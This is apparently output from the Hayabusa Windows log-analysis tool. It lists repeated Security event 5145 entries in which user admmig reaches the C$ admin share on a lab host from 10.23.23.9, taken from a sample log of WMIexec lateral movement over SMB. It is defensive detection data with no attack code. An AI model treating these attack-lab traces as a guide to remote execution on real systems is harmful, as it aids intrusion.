10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 